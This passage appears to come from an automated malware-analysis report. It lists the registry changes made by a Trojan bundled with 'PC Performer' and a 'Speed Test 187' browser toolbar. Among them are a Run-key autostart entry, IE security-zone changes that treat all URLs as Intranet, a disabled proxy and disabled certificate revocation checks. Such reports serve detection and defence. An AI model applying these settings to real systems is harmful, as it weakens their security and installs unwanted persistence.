"Seed" = "8C D1 5B 41 3A BA 2D FB 93 2C F0 B7 A3 1D CF D5"

[HKCU\Software\PerformerSoft\PC Performer\LANG]
"LangCode" = "en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"DisplayVersion" = "11.10"
"NoModify" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PC Performer_is1]
"MajorVersion" = "11"

The process %original file name%.exe:396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"INSTALL_URL" = "http://performersoft.com/pcperformer/welcome/index.php?cid=4751"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"RENEWALURL" = "http://performersoft.com/pcperformer/buy/pcp-buy-redirect.php?renew=1&cid=4751"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 10 02 4F 31 9B 2F 63 35 35 FF 3E DF 93 C4 68"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"UNINSTALL_URL" = "http://performersoft.com/pcperformer/afteruninstall.php?cid=4751"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"RCPURL" = "http://performersoft.com/pcperformer/buy/pcp-buy-redirect.php?cid=4751"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process PCPerformerSetup.exe:284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "49 E0 EA B9 3F 86 A1 9C 43 94 0D BA BB 9E 44 19"

The process PCPerformer.exe:476 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}]
"(Default)" = "Microsoft DirectInputDevice8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"NetHood" = "%Documents and Settings%\%current user%\NetHood"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Fonts" = "%WinDir%\Fonts"

[HKLM\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
"TrapPollTimeMilliSecs" = "15000"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\PerformerSoft\PC Performer]
"StartAutoScanPMUI" = "0"

[HKCU\Software\Licenses]
"{K7C0DB872A3F777C0}" = "98 D2 7E 56 43 16 1F 05 48 6E 02 90 27 91 BF BE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1371634005"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}\InprocServer32]
"(Default)" = "%System%\dinput8.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}\InprocServer32]
"ThreadingModel" = "Both"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "PCPerformer.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\PerformerSoft\PC Performer]
"FirstRun" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\PerformerSoft\PC Performer]
"Expired" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 12 8C C9 8B 70 C6 C4 75 16 B8 FC DC 03 79 0D"

[HKCU\Software\Licenses]
"{R7C0DB872A3F777C0}" = "4A 8D 7D 4C"
"{IB278E36AA51C7412}" = "01 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Licenses]
"{0B278E36AA51C7412}" = "56 3E A8 0E 0B A2 A7 A6 41 06 53 98 78 A5 44 A3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Recent" = "%Documents and Settings%\%current user%\Recent"
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"RDReminder" = "%Program Files%\PC Performer\PCPerformer.exe -rem"

The Trojan deletes the following value(s) in system registry:

[HKCR\CLSID\{AF175732-0D59-716D-F757-9F1492D808D9}]
"0"

The process SpeedTest.exe:1220 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "93 FA 88 C3 3C BC D9 1C 6E 49 D0 0A 4F A0 C8 53"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"CertificateRevocation" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"Publisher" = "Speed Analysis"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"UninstallString" = "%Program Files%\Speed Test 187\uninstall_nsis.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

The process regsvr32.exe:788 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{43969E3F-3E7C-4911-A8F1-79C6CA6AC731}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}]
"(Default)" = "IUI"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\AppID\AddonsFramework.DLL]
"AppID" = "{19975B78-1907-4DD6-A437-4C48120F46A4}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}]
"(Default)" = "IExposedContent"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0]
"(Default)" = "AddonsFramework 1.0 Type Library"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}]
"(Default)" = "IBrowserEvents"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\AddonsFramework.Typelib.dll"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{94CADA2E-1D3F-419F-8A3D-06C58EDF53C8}]
"(Default)" = "IExposed"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}]
"(Default)" = "IBackgroundEvents"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"Version" = "1.0"

[HKCR\Interface\{C815E3DA-0823-49B0-9270-D1771D58B317}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}]
"(Default)" = "IExtensionContent"

[HKCR\AppID\{19975B78-1907-4DD6-A437-4C48120F46A4}]
"(Default)" = "AddonsFramework"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}]
"(Default)" = "IButton"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 19 58 98 DE 27 0D 8F CB 4F 7F 4E E1 07 FA 43"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{C1995F88-1C7F-40D7-B0FA-6F107F6308B8}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{395AFE6E-8308-48DB-89BE-ED5F4AA3D3EC}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\ProxyStubClsid]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{EE95078D-518C-4FD2-8093-FD1D4E33D3CA}]
"(Default)" = "IBrowserFrame"

[HKCR\TypeLib\{D5B70EEE-9F28-4368-A960-670C5D543131}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\Interface\{F9EB11AB-9384-4736-9B33-993940F88895}]
"(Default)" = "IContentEvents"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}]
"(Default)" = "IInternalEvents"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}]
"(Default)" = "IContextMenuItem"

[HKCR\Interface\{BBBE01ED-0F1E-44DB-88C1-5CC1AEE3B462}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{9E52EB8B-8DD9-4605-AD36-D352BCD482F2}]
"(Default)" = "IBrowser"

[HKCR\Interface\{B9A84AD0-5777-46FD-8B8F-1EBD06750FBC}]
"(Default)" = "IExtension"

[HKCR\Interface\{43B390F0-6BA2-45CA-ABF2-5DB0CEE9B49D}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{E4A994B0-5550-4680-A4C6-B9470B888069}\ProxyStubClsid32]
"(Default)" = "{00020420-0000-0000-C000-000000000046}"

[HKCR\Interface\{045F91B3-695F-423A-98C7-8DE3C47AA020}\TypeLib]
"(Default)" = "{D5B70EEE-9F28-4368-A960-670C5D543131}"

[HKCR\Interface\{A1440EC3-F0FA-407A-B811-DE6668C06D29}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

The process regsvr32.exe:1272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 33 08 73 49 9D EF 4A 65 81 E1 A5 22 2B C4 64"

[HKCR\AppID\{562B9317-C08A-444A-9482-62080DD851AE}]
"(Default)" = "ButtonSite"

[HKCR\Speed Test 187.Navbar.1]
"(Default)" = "Navbar Class"

[HKCR\Speed Test 187.Navbar.1\CLSID]
"(Default)" = "{06FD8960-0295-4029-A3FA-E0027664272F}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\ProgID]
"(Default)" = "Speed Test 187.Navbar.1"

[HKCR\Speed Test 187.Navbar\CLSID]
"(Default)" = "{06FD8960-0295-4029-A3FA-E0027664272F}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\TypeLib]
"(Default)" = "{196FE301-0D95-4194-BFB8-3A174AAD6ED2}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ButtonSite.dll"

[HKCR\Speed Test 187.Navbar]
"(Default)" = "Navbar Class"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\ButtonSite.dll"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\TypeLib\{196FE301-0D95-4194-BFB8-3A174AAD6ED2}\1.0]
"(Default)" = "ButtonSiteLib"

[HKCR\AppID\ButtonSite.DLL]
"AppID" = "{562B9317-C08A-444A-9482-62080DD851AE}"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}]
"(Default)" = "Navbar Class"

[HKCR\Speed Test 187.Navbar\CurVer]
"(Default)" = "Speed Test 187.Navbar.1"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.Navbar"

The Trojan deletes the following registry key(s):

[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\TypeLib]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\VersionIndependentProgID]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\Programmable]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\ProgID]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}\InprocServer32]
[HKCR\CLSID\{06FD8960-0295-4029-A3FA-E0027664272F}]

The process regsvr32.exe:1432 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCR\Speed Test 187.ScriptHostObject\CurVer]
"(Default)" = "Speed Test 187.ScriptHostObject.1"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.Tool"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\VersionIndependentProgID]
"(Default)" = "Speed Test 187.ScriptHostObject"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\HELPDIR]
"(Default)" = "%Program Files%\Speed Test 187"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\ProgID]
"(Default)" = "Speed Test 187.Tool.1"

